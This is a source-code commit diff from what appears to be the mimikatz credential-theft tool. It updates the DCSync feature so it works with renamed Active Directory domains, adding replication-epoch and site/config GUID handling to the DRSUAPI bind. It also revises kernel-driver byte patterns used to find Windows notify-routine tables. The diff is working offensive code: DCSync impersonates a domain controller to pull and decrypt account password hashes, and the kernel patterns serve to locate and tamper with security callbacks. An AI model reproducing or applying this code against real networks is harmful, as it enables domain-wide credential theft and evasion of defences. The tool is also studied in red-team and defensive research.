[close #35] DCSync works with renamed domains
Thanks to @rmbolger & @MichaelGrafnetter, DCSync now deals with msDS-ReplicationEpoch / dwReplEpoch
This commit is contained in:
parent
9e298f16e4
commit
ea52c92cec
|
@ -19,17 +19,14 @@ POB_POST_OPERATION_CALLBACK kkll_m_notify_fakePost = NULL;
|
||||||
|
|
||||||
#ifdef _M_X64
|
#ifdef _M_X64
|
||||||
UCHAR PTRN_W23_Thread[] = {0x66, 0x90, 0x66, 0x90, 0x48, 0x8b, 0xce, 0xe8};
|
UCHAR PTRN_W23_Thread[] = {0x66, 0x90, 0x66, 0x90, 0x48, 0x8b, 0xce, 0xe8};
|
||||||
UCHAR PTRN_WVI_Thread[] = {0x49, 0x8b, 0x8c, 0x24, 0xf8, 0x01, 0x00, 0x00, 0x41, 0xb0, 0x01, 0x49, 0x8b, 0x94, 0x24, 0x88, 0x03, 0x00, 0x00};
|
UCHAR PTRN_WVI_Thread[] = {0xbf, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8};
|
||||||
UCHAR PTRN_WI7_Thread[] = {0x41, 0xbf, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8};
|
|
||||||
UCHAR PTRN_WI8_Thread[] = {0xbf, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8};
|
|
||||||
UCHAR PTRN_W81_Thread[] = {0x41, 0xbf, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8};
|
|
||||||
UCHAR PTRN_W10_Thread[] = {0x48, 0x8b, 0xcd, 0xe8};
|
UCHAR PTRN_W10_Thread[] = {0x48, 0x8b, 0xcd, 0xe8};
|
||||||
KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
|
KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
|
||||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Thread), PTRN_W23_Thread}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Thread), PTRN_W23_Thread}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"PsDereferenceKernelStack", L"ExRaiseAccessViolation", {-20, 64}},
|
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"PsDereferenceKernelStack", L"ExRaiseAccessViolation", { -5, 64}},
|
||||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Thread), PTRN_WI7_Thread}, L"PsDereferenceKernelStack", L"MmIsVerifierEnabled", { -4, 64}},
|
{KiwiOsIndex_7, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"RtlUnicodeToMultiByteSize", L"MmLockPagableSectionByHandle", { -5, 64}},
|
||||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Thread), PTRN_WI8_Thread}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
{KiwiOsIndex_8, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
||||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlCopySidAndAttributesArray", L"NtFindAtom", { -4, 64}},
|
{KiwiOsIndex_BLUE, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"ObCreateObject", L"NtFindAtom", { -5, 64}},
|
||||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||||
};
|
};
|
||||||
|
@ -45,9 +42,9 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
|
||||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"SeCreateAccessStateEx", L"PsReferenceImpersonationToken", { -4, 64}},
|
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"SeCreateAccessStateEx", L"PsReferenceImpersonationToken", { -4, 64}},
|
||||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Process), PTRN_WI7_Process}, L"RtlAreAllAccessesGranted", L"RtlGetIntegerAtom", { -4, 64}},
|
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Process), PTRN_WI7_Process}, L"RtlAreAllAccessesGranted", L"RtlGetIntegerAtom", { -4, 64}},
|
||||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Process), PTRN_WI8_Process}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Process), PTRN_WI8_Process}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
||||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlCopySidAndAttributesArray", L"NtFindAtom", { -4, 64}},
|
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"ObCreateObject", L"NtFindAtom", { -4, 64}},
|
||||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process}, L"PsSetCreateProcessNotifyRoutine", L"IoReportDetectedDevice", { -4, 64}},
|
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}},
|
||||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PsSetCreateProcessNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}},
|
||||||
};
|
};
|
||||||
UCHAR PTRN_W23_Image[] = {0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00};
|
UCHAR PTRN_W23_Image[] = {0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00};
|
||||||
UCHAR PTRN_WVI_Image[] = {0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00};
|
UCHAR PTRN_WVI_Image[] = {0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00};
|
||||||
|
@ -67,7 +64,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = {
|
||||||
UCHAR PTRN_W23_Object[] = {0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4};
|
UCHAR PTRN_W23_Object[] = {0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4};
|
||||||
UCHAR PTRN_WVI_Object[] = {0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68};
|
UCHAR PTRN_WVI_Object[] = {0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68};
|
||||||
UCHAR PTRN_WI7_Object[] = {0x41, 0x8a, 0xde, 0x44, 0x88, 0x74, 0x24, 0x47, 0x88, 0x5c, 0x24, 0x46, 0x4c, 0x89, 0x74, 0x24, 0x38, 0x4c, 0x89, 0x74, 0x24, 0x30, 0x49, 0x8b, 0xee, 0xc7, 0x44, 0x24, 0x48};
|
UCHAR PTRN_WI7_Object[] = {0x41, 0x8a, 0xde, 0x44, 0x88, 0x74, 0x24, 0x47, 0x88, 0x5c, 0x24, 0x46, 0x4c, 0x89, 0x74, 0x24, 0x38, 0x4c, 0x89, 0x74, 0x24, 0x30, 0x49, 0x8b, 0xee, 0xc7, 0x44, 0x24, 0x48};
|
||||||
UCHAR PTRN_WI8_Object[] = {0x41, 0x8a, 0xd8, 0x44, 0x88, 0x44, 0x24, 0x4f, 0x88, 0x5c, 0x24, 0x4e, 0x4c, 0x89, 0x44, 0x24, 0x38, 0x4d, 0x8b, 0xf0, 0x4c, 0x89, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x50};
|
UCHAR PTRN_WI8_Object[] = {0x41, 0x8a, 0xd8, 0x44, 0x88, 0x44, 0x24, 0x4f, 0x88, 0x5c, 0x24, 0x4e, 0x4c, 0x89, 0x44, 0x24, 0x38, 0x4d, 0x8b, 0xf0, 0x4c, 0x89, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x50}; ////////// todo
|
||||||
UCHAR PTRN_W81_Object[] = {0x41, 0x8a, 0xd8, 0x44, 0x88, 0x44, 0x24, 0x4f, 0x88, 0x5c, 0x24, 0x4e, 0x4c, 0x89, 0x44, 0x24, 0x38, 0x4d, 0x8b, 0xf0, 0x4c, 0x89, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x50};
|
UCHAR PTRN_W81_Object[] = {0x41, 0x8a, 0xd8, 0x44, 0x88, 0x44, 0x24, 0x4f, 0x88, 0x5c, 0x24, 0x4e, 0x4c, 0x89, 0x44, 0x24, 0x38, 0x4d, 0x8b, 0xf0, 0x4c, 0x89, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x50};
|
||||||
UCHAR PTRN_W10_Object[] = {0x0f, 0xb7, 0x02, 0xff, 0xc9, 0x49, 0x03};
|
UCHAR PTRN_W10_Object[] = {0x0f, 0xb7, 0x02, 0xff, 0xc9, 0x49, 0x03};
|
||||||
KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
|
KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
|
||||||
|
|
|
@ -1726,6 +1726,8 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||||
ULONG drsStatus;
|
ULONG drsStatus;
|
||||||
LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL;
|
LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL;
|
||||||
LPWSTR szTmpDc = NULL;
|
LPWSTR szTmpDc = NULL;
|
||||||
|
DWORD dwReplEpoch;
|
||||||
|
GUID SiteObjGuid, ConfigObjGUID;
|
||||||
|
|
||||||
if(!kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
|
if(!kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
|
||||||
if(kull_m_net_getCurrentDomainInfo(&pPolicyDnsDomainInfo))
|
if(kull_m_net_getCurrentDomainInfo(&pPolicyDnsDomainInfo))
|
||||||
|
@ -1740,19 +1742,22 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||||
|
|
||||||
if(szDc)
|
if(szDc)
|
||||||
{
|
{
|
||||||
kprintf(L"[DC] \'%s\' will be the DC server\n\n", szDc);
|
kprintf(L"[DC] \'%s\' will be the DC server\n", szDc);
|
||||||
if(kull_m_string_args_byName(argc, argv, L"guid", &szGuid, NULL) || kull_m_string_args_byName(argc, argv, L"user", &szUser, NULL))
|
if(kull_m_string_args_byName(argc, argv, L"guid", &szGuid, NULL) || kull_m_string_args_byName(argc, argv, L"user", &szUser, NULL))
|
||||||
{
|
{
|
||||||
if(szGuid)
|
if(szGuid)
|
||||||
kprintf(L"[DC] Object with GUID \'%s\'\n\n", szGuid);
|
kprintf(L"[DC] Object with GUID \'%s\'\n", szGuid);
|
||||||
else
|
else
|
||||||
kprintf(L"[DC] \'%s\' will be the user account\n\n", szUser);
|
kprintf(L"[DC] \'%s\' will be the user account\n", szUser);
|
||||||
|
|
||||||
if(kull_m_rpc_drsr_createBinding(szDc, &hBinding))
|
if(kull_m_rpc_drsr_createBinding(szDc, &hBinding))
|
||||||
{
|
{
|
||||||
if(kull_m_rpc_drsr_getDomainAndUserInfos(&hBinding, szDc, szDomain, &getChReq.V8.uuidDsaObjDest, szUser, szGuid, &dsName.Guid))
|
if(kull_m_rpc_drsr_getDomainAndUserInfos(&hBinding, szDc, szDomain, &getChReq.V8.uuidDsaObjDest, szUser, szGuid, &dsName.Guid, &dwReplEpoch, &SiteObjGuid, &ConfigObjGUID))
|
||||||
{
|
{
|
||||||
if(kull_m_rpc_drsr_getDCBind(&hBinding, &getChReq.V8.uuidDsaObjDest, &hDrs))
|
if(dwReplEpoch)
|
||||||
|
kprintf(L"[DC] ms-DS-ReplicationEpoch is: %u\n", dwReplEpoch);
|
||||||
|
|
||||||
|
if(kull_m_rpc_drsr_getDCBind(&hBinding, &getChReq.V8.uuidDsaObjDest, &hDrs, &dwReplEpoch, &SiteObjGuid, &ConfigObjGUID))
|
||||||
{
|
{
|
||||||
getChReq.V8.pNC = &dsName;
|
getChReq.V8.pNC = &dsName;
|
||||||
getChReq.V8.ulFlags = DRS_INIT_SYNC | DRS_WRIT_REP | DRS_NEVER_SYNCED | DRS_FULL_SYNC_NOW | DRS_SYNC_URGENT;
|
getChReq.V8.ulFlags = DRS_INIT_SYNC | DRS_WRIT_REP | DRS_NEVER_SYNCED | DRS_FULL_SYNC_NOW | DRS_SYNC_URGENT;
|
||||||
|
@ -1863,7 +1868,7 @@ BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWO
|
||||||
|
|
||||||
void kuhl_m_lsadump_dcsync_descrObject(ATTRBLOCK *attributes, LPCWSTR szSrcDomain)
|
void kuhl_m_lsadump_dcsync_descrObject(ATTRBLOCK *attributes, LPCWSTR szSrcDomain)
|
||||||
{
|
{
|
||||||
kuhl_m_lsadump_dcsync_findPrintMonoAttr(L"Object RDN : ", attributes, ATT_RDN, TRUE);
|
kuhl_m_lsadump_dcsync_findPrintMonoAttr(L"\nObject RDN : ", attributes, ATT_RDN, TRUE);
|
||||||
kprintf(L"\n");
|
kprintf(L"\n");
|
||||||
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_SAM_ACCOUNT_NAME, NULL, NULL))
|
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_SAM_ACCOUNT_NAME, NULL, NULL))
|
||||||
kuhl_m_lsadump_dcsync_descrUser(attributes);
|
kuhl_m_lsadump_dcsync_descrUser(attributes);
|
||||||
|
|
|
@ -93,25 +93,25 @@ BOOL kull_m_rpc_drsr_deleteBinding(RPC_BINDING_HANDLE *hBinding)
|
||||||
}
|
}
|
||||||
|
|
||||||
GUID DRSUAPI_DS_BIND_GUID_Standard = {0xe24d201a, 0x4fd6, 0x11d1, {0xa3, 0xda, 0x00, 0x00, 0xf8, 0x75, 0xae, 0x0d}};
|
GUID DRSUAPI_DS_BIND_GUID_Standard = {0xe24d201a, 0x4fd6, 0x11d1, {0xa3, 0xda, 0x00, 0x00, 0xf8, 0x75, 0xae, 0x0d}};
|
||||||
BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid)
|
BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid, DWORD *dwReplEpoch, GUID *SiteObjGuid, GUID *ConfigObjGUID)
|
||||||
{
|
{
|
||||||
BOOL DomainGUIDfound = FALSE, ObjectGUIDfound = FALSE;
|
BOOL DomainGUIDfound = FALSE, ObjectGUIDfound = FALSE;
|
||||||
DWORD i;
|
DWORD i;
|
||||||
ULONG drsStatus;
|
ULONG drsStatus;
|
||||||
DRS_HANDLE hDrs = NULL;
|
DRS_HANDLE hDrs = NULL;
|
||||||
DRS_EXTENSIONS_INT DrsExtensionsInt = {0};
|
|
||||||
DRS_EXTENSIONS *pDrsExtensionsOutput = NULL;
|
|
||||||
DRS_MSG_DCINFOREQ dcInfoReq = {0};
|
DRS_MSG_DCINFOREQ dcInfoReq = {0};
|
||||||
DWORD dcOutVersion = 0;
|
DWORD dcOutVersion = 0;
|
||||||
DRS_MSG_DCINFOREPLY dcInfoRep = {0};
|
DRS_MSG_DCINFOREPLY dcInfoRep = {0};
|
||||||
LPWSTR sGuid;
|
LPWSTR sGuid;
|
||||||
UNICODE_STRING uGuid;
|
UNICODE_STRING uGuid;
|
||||||
|
|
||||||
RpcTryExcept
|
*dwReplEpoch = 0;
|
||||||
|
RtlZeroMemory(SiteObjGuid, sizeof(GUID));
|
||||||
|
RtlZeroMemory(ConfigObjGUID, sizeof(GUID));
|
||||||
|
|
||||||
|
if(kull_m_rpc_drsr_getDCBind(hBinding, &DRSUAPI_DS_BIND_GUID_Standard, &hDrs, dwReplEpoch, SiteObjGuid, ConfigObjGUID))
|
||||||
{
|
{
|
||||||
DrsExtensionsInt.cb = sizeof(DRS_EXTENSIONS_INT) - sizeof(DWORD);
|
RpcTryExcept
|
||||||
drsStatus = IDL_DRSBind(*hBinding, &DRSUAPI_DS_BIND_GUID_Standard, (DRS_EXTENSIONS *) &DrsExtensionsInt, &pDrsExtensionsOutput, &hDrs);
|
|
||||||
if(drsStatus == 0)
|
|
||||||
{
|
{
|
||||||
dcInfoReq.V1.InfoLevel = 2;
|
dcInfoReq.V1.InfoLevel = 2;
|
||||||
dcInfoReq.V1.Domain = (LPWSTR) Domain;
|
dcInfoReq.V1.Domain = (LPWSTR) Domain;
|
||||||
|
@ -135,7 +135,7 @@ BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR
|
||||||
kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data(dcOutVersion, &dcInfoRep);
|
kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data(dcOutVersion, &dcInfoRep);
|
||||||
}
|
}
|
||||||
else PRINT_ERROR(L"DomainControllerInfo: 0x%08x (%u)\n", drsStatus, drsStatus);
|
else PRINT_ERROR(L"DomainControllerInfo: 0x%08x (%u)\n", drsStatus, drsStatus);
|
||||||
|
|
||||||
if(Guid)
|
if(Guid)
|
||||||
{
|
{
|
||||||
RtlInitUnicodeString(&uGuid, Guid);
|
RtlInitUnicodeString(&uGuid, Guid);
|
||||||
|
@ -149,40 +149,57 @@ BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR
|
||||||
ObjectGUIDfound = NT_SUCCESS(RtlGUIDFromString(&uGuid, UserGuid));
|
ObjectGUIDfound = NT_SUCCESS(RtlGUIDFromString(&uGuid, UserGuid));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
drsStatus = IDL_DRSUnbind(&hDrs);
|
|
||||||
MIDL_user_free(pDrsExtensionsOutput);
|
|
||||||
}
|
}
|
||||||
|
RpcExcept(DRS_EXCEPTION)
|
||||||
|
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||||
|
RpcEndExcept
|
||||||
|
|
||||||
}
|
}
|
||||||
RpcExcept(DRS_EXCEPTION)
|
|
||||||
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
|
||||||
RpcEndExcept
|
|
||||||
return (DomainGUIDfound && (ObjectGUIDfound || !(Guid || User)));
|
return (DomainGUIDfound && (ObjectGUIDfound || !(Guid || User)));
|
||||||
}
|
}
|
||||||
|
|
||||||
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs)
|
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs, DWORD *dwReplEpoch, GUID *SiteObjGuid, GUID *ConfigObjGUID)
|
||||||
{
|
{
|
||||||
BOOL status = FALSE;
|
BOOL status = FALSE;
|
||||||
ULONG drsStatus;
|
ULONG drsStatus;
|
||||||
DRS_EXTENSIONS_INT DrsExtensionsInt;// = {0};
|
DRS_EXTENSIONS_INT DrsExtensionsInt = {0};
|
||||||
DRS_EXTENSIONS *pDrsExtensionsOutput = NULL;
|
DRS_EXTENSIONS_INT *pDrsExtensionsOutput = NULL;
|
||||||
|
|
||||||
DrsExtensionsInt.cb = sizeof(DRS_EXTENSIONS_INT) - sizeof(DWORD);
|
DrsExtensionsInt.cb = sizeof(DRS_EXTENSIONS_INT) - sizeof(DWORD);
|
||||||
DrsExtensionsInt.dwFlags = DRS_EXT_GETCHGREPLY_V6 | DRS_EXT_STRONG_ENCRYPTION;
|
DrsExtensionsInt.dwFlags = DRS_EXT_GETCHGREPLY_V6 | DRS_EXT_STRONG_ENCRYPTION;
|
||||||
|
DrsExtensionsInt.SiteObjGuid = *SiteObjGuid;
|
||||||
|
DrsExtensionsInt.dwReplEpoch = *dwReplEpoch;
|
||||||
|
DrsExtensionsInt.ConfigObjGUID = *ConfigObjGUID;
|
||||||
|
|
||||||
RpcTryExcept
|
RpcTryExcept
|
||||||
{
|
{
|
||||||
drsStatus = IDL_DRSBind(*hBinding, NtdsDsaObjectGuid, (DRS_EXTENSIONS *) &DrsExtensionsInt, &pDrsExtensionsOutput, hDrs); // to free ?
|
drsStatus = IDL_DRSBind(*hBinding, NtdsDsaObjectGuid, (DRS_EXTENSIONS *) &DrsExtensionsInt, (DRS_EXTENSIONS **) &pDrsExtensionsOutput, hDrs); // to free ?
|
||||||
if(drsStatus == 0)
|
if(drsStatus == 0)
|
||||||
{
|
{
|
||||||
if(pDrsExtensionsOutput)
|
if(pDrsExtensionsOutput)
|
||||||
{
|
{
|
||||||
if(((DRS_EXTENSIONS_INT *) pDrsExtensionsOutput)->dwFlags & (DRS_EXT_GETCHGREQ_V8 | DRS_EXT_STRONG_ENCRYPTION))
|
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, SiteObjGuid) - sizeof(DWORD))
|
||||||
status = TRUE;
|
{
|
||||||
else PRINT_ERROR(L"Incorrect DRS Extensions Output (%08x)\n", ((DRS_EXTENSIONS_INT *) pDrsExtensionsOutput)->dwFlags);
|
if(pDrsExtensionsOutput->dwFlags & (DRS_EXT_GETCHGREQ_V8 | DRS_EXT_STRONG_ENCRYPTION))
|
||||||
|
status = TRUE;
|
||||||
|
else PRINT_ERROR(L"Incorrect DRS Extensions Output (%08x)\n", pDrsExtensionsOutput->dwFlags);
|
||||||
|
|
||||||
|
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, Pid) - sizeof(DWORD))
|
||||||
|
{
|
||||||
|
*SiteObjGuid = pDrsExtensionsOutput->SiteObjGuid;
|
||||||
|
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwFlagsExt) - sizeof(DWORD))
|
||||||
|
{
|
||||||
|
*dwReplEpoch = pDrsExtensionsOutput->dwReplEpoch;
|
||||||
|
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwExtCaps) - sizeof(DWORD))
|
||||||
|
*ConfigObjGUID = pDrsExtensionsOutput->ConfigObjGUID;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else PRINT_ERROR(L"Incorrect DRS Extensions Output Size (%u)\n", pDrsExtensionsOutput->cb);
|
||||||
MIDL_user_free(pDrsExtensionsOutput);
|
MIDL_user_free(pDrsExtensionsOutput);
|
||||||
}
|
}
|
||||||
else PRINT_ERROR(L"No DRS Extensions Output\n");
|
else PRINT_ERROR(L"No DRS Extensions Output\n");
|
||||||
|
|
||||||
if(!status)
|
if(!status)
|
||||||
IDL_DRSUnbind(hDrs);
|
IDL_DRSUnbind(hDrs);
|
||||||
}
|
}
|
||||||
|
|
|
@ -12,12 +12,12 @@
|
||||||
typedef struct _DRS_EXTENSIONS_INT {
|
typedef struct _DRS_EXTENSIONS_INT {
|
||||||
DWORD cb;
|
DWORD cb;
|
||||||
DWORD dwFlags;
|
DWORD dwFlags;
|
||||||
//GUID SiteObjGuid;
|
GUID SiteObjGuid;
|
||||||
//DWORD Pid;
|
DWORD Pid;
|
||||||
//DWORD dwReplEpoch;
|
DWORD dwReplEpoch;
|
||||||
//DWORD dwFlagsExt;
|
DWORD dwFlagsExt;
|
||||||
//GUID ConfigObjGUID;
|
GUID ConfigObjGUID;
|
||||||
//DWORD dwExtCaps;
|
DWORD dwExtCaps;
|
||||||
} DRS_EXTENSIONS_INT, *PDRS_EXTENSIONS_INT;
|
} DRS_EXTENSIONS_INT, *PDRS_EXTENSIONS_INT;
|
||||||
|
|
||||||
typedef struct _ENCRYPTED_PAYLOAD {
|
typedef struct _ENCRYPTED_PAYLOAD {
|
||||||
|
@ -193,8 +193,8 @@ void RPC_ENTRY kull_m_rpc_drsr_RpcSecurityCallback(void *Context);
|
||||||
BOOL kull_m_rpc_drsr_createBinding(LPCWSTR server, RPC_BINDING_HANDLE *hBinding);
|
BOOL kull_m_rpc_drsr_createBinding(LPCWSTR server, RPC_BINDING_HANDLE *hBinding);
|
||||||
BOOL kull_m_rpc_drsr_deleteBinding(RPC_BINDING_HANDLE *hBinding);
|
BOOL kull_m_rpc_drsr_deleteBinding(RPC_BINDING_HANDLE *hBinding);
|
||||||
|
|
||||||
BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid);
|
BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid, DWORD *dwReplEpoch, GUID *SiteObjGuid, GUID *ConfigObjGUID);
|
||||||
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs);
|
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs, DWORD *dwReplEpoch, GUID *SiteObjGuid, GUID *ConfigObjGUID);
|
||||||
BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWSTR Name, DS_NAME_FORMAT FormatWanted, LPWSTR *CrackedName, LPWSTR *CrackedDomain);
|
BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWSTR Name, DS_NAME_FORMAT FormatWanted, LPWSTR *CrackedName, LPWSTR *CrackedDomain);
|
||||||
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects);
|
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects);
|
||||||
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(ATTRVAL *val);
|
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(ATTRVAL *val);
|
||||||
|
|
Loading…
Reference in New Issue